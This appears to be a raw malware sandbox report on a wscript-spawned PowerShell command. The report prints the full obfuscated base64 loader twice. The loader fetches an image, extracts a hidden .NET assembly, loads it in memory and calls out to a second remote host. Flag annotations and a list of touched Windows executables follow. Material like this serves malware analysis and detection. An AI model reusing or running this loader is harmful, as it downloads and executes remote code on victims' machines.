░░░a░░░Bv░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░B0░░░Hk░░░c░░░Bl░░░C4░░░RwBl░░░HQ░░░TQBl░░░HQ░░░a░░░Bv░░░GQ░░░K░░░░░░n░░░FY░░░QQBJ░░░Cc░░░KQ░░░7░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░I░░░░░░9░░░C░░░░░░L░░░░░░o░░░Cc░░░d░░░B4░░░HQ░░░LgB4░░░G8░░░bQBv░░░C8░░░Mg░░░1░░░C4░░░O░░░░░░0░░░C4░░░M░░░░░░x░░░DE░░░Lg░░░5░░░Dc░░░Lw░░░v░░░Do░░░c░░░B0░░░HQ░░░a░░░░░░n░░░Ck░░░Ow░░░k░░░G0░░░ZQB0░░░Gg░░░bwBk░░░C4░░░SQBu░░░HY░░░bwBr░░░GU░░░K░░░░░░k░░░G4░░░dQBs░░░Gw░░░L░░░░░░g░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░KQ░░░='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('░░░','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ░░░u░░░GI░░░cg░░░v░░░Gk░░░bQBh░░░Gc░░░ZQBz░░░C8░░░M░░░░░░w░░░DQ░░░Lw░░░1░░░DY░░░Mw░░░v░░░DY░░░Mg░░░x░░░C8░░░bwBy░░░Gk░░░ZwBp░░░G4░░░YQBs░░░C8░░░dQBu░░░Gk░░░dgBl░░░HI░░░cwBv░░░F8░░░dgBi░░░HM░░░LgBq░░░H░░░░░░ZQBn░░░D8░░░MQ░░░2░░░Dk░░░M░░░░░░5░░░DM░░░MQ░░░4░░░DU░░░NQ░░░n░░░Ds░░░J░░░B3░░░GU░░░YgBD░░░Gw░░░aQBl░░░G4░░░d░░░░░░g░░░D0░░░I░░░BO░░░GU░░░dw░░░t░░░E8░░░YgBq░░░GU░░░YwB0░░░C░░░░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBO░░░GU░░░d░░░░░░u░░░Fc░░░ZQBi░░░EM░░░b░░░Bp░░░GU░░░bgB0░░░Ds░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░CQ░░░dwBl░░░GI░░░QwBs░░░Gk░░░ZQBu░░░HQ░░░LgBE░░░G8░░░dwBu░░░Gw░░░bwBh░░░GQ░░░R░░░Bh░░░HQ░░░YQ░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FU░░░cgBs░░░Ck░░░Ow░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBU░░░GU░░░e░░░B0░░░C4░░░RQBu░░░GM░░░bwBk░░░Gk░░░bgBn░░░F0░░░Og░░░6░░░FU░░░V░░░BG░░░Dg░░░LgBH░░░GU░░░d░░░BT░░░HQ░░░cgBp░░░G4░░░Zw░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░EI░░░eQB0░░░GU░░░cw░░░p░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░FM░░░V░░░BB░░░FI░░░V░░░░░░+░░░D4░░░Jw░░░7░░░CQ░░░ZQBu░░░GQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░EU░░░TgBE░░░D4░░░Pg░░░n░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░PQ░░░g░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FQ░░░ZQB4░░░HQ░░░LgBJ░░░G4░░░Z░░░Bl░░░Hg░░░TwBm░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░p░░░Ds░░░J░░░Bl░░░G4░░░Z░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░Ek░░░bgBk░░░GU░░░e░░░BP░░░GY░░░K░░░░░░k░░░GU░░░bgBk░░░EY░░░b░░░Bh░░░Gc░░░KQ░░░7░░░CQ░░░cwB0░░░GE░░░cgB0░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwBl░░░C░░░░░░M░░░░░░g░░░C0░░░YQBu░░░GQ░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwB0░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░Kw░░░9░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░u░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ds░░░J░░░Bi░░░GE░░░cwBl░░░DY░░░N░░░BM░░░GU░░░bgBn░░░HQ░░░a░░░░░░g░░░D0░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░Ow░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░FM░░░dQBi░░░HM░░░d░░░By░░░Gk░░░bgBn░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Cw░░░I░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ck░░░Ow░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBD░░░G8░░░bgB2░░░GU░░░cgB0░░░F0░░░Og░░░6░░░EY░░░cgBv░░░G0░░░QgBh░░░HM░░░ZQ░░░2░░░DQ░░░UwB0░░░HI░░░aQBu░░░Gc░░░K░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░KQ░░░7░░░CQ░░░b░░░Bv░░░GE░░░Z░░░Bl░░░GQ░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBS░░░GU░░░ZgBs░░░GU░░░YwB0░░░Gk░░░bwBu░░░C4░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░F0░░░Og░░░6░░░Ew░░░bwBh░░░GQ░░░K░░░░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░Ck░░░Ow░░░k░░░HQ░░░eQBw░░░GU░░░I░░░░░░9░░░C░░░░░░J░░░Bs░░░G8░░░YQBk░░░GU░░░Z░░░BB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░LgBH░░░GU░░░d░░░BU░░░Hk░░░c░░░Bl░░░Cg░░░JwBG░░░Gk░░░YgBl░░░HI░░░LgBI░░░G8░░░bQBl░░░Cc░░░KQ░░░7░░░CQ░░░bQBl░░░HQ░░░a░░░Bv░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░B0░░░Hk░░░c░░░Bl░░░C4░░░RwBl░░░HQ░░░TQBl░░░HQ░░░a░░░Bv░░░GQ░░░K░░░░░░n░░░FY░░░QQBJ░░░Cc░░░KQ░░░7░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░I░░░░░░9░░░C░░░░░░L░░░░░░o░░░Cc░░░d░░░B4░░░HQ░░░LgB4░░░G8░░░bQBv░░░C8░░░Mg░░░1░░░C4░░░O░░░░░░0░░░C4░░░M░░░░░░x░░░DE░░░Lg░░░5░░░Dc░░░Lw░░░v░░░Do░░░c░░░B0░░░HQ░░░a░░░░░░n░░░Ck░░░Ow░░░k░░░G0░░░ZQB0░░░Gg░░░bwBk░░░C4░░░SQBu░░░HY░░░bwBr░░░GU░░░K░░░░░░k░░░G4░░░dQBs░░░Gw░░░L░░░░░░g░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░KQ░░░='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('░░░','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe